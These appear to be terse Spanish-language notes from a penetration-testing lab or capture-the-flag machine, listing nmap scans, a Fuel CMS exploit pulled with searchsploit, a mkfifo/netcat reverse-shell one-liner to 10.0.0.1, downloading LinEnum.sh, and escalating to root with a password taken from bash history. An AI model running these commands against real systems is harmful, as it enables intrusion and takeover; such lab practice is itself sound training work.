nmap -A -p- -oA output 172.31.1.28 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210702100730.png

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.28 -oG allPorts

Pasted image 20210702102108.png

extractPorts allPorts

Pasted image 20210702102121.png

nmap -sC -sV -p1880 172.31.1.28 -oN targeted

Pasted image 20210702102200.png

nmap --script http-enum -p1880 172.31.1.28 -oN webScan

Pasted image 20210702102315.png

whatweb 172.31.1.28:80

Pasted image 20210702102505.png

cat targeted

Pasted image 20210702102654.png

Pasted image 20210702143951.png

Pasted image 20210702143930.png

Pasted image 20210702144853.png

searchsploit Fuel

searchsploit -m 47318.py

Modificamos el archivo

Pasted image 20210702144800.png

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Pasted image 20210702151732.png

which python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l

No tenemos las credenciales para moira

Pasted image 20210702153210.png

python3 -m http.server 8888

wget http://10.10.0.12:8888/LinEnum.sh

chmod +x LinEnum.sh

Pasted image 20210702160837.png

su root

Ponemos la contraseña que se encontró en el historial de bash; una contraseña escrita como argumento de un comando queda guardada ahí en texto claro.

Pasted image 20210702161639.png
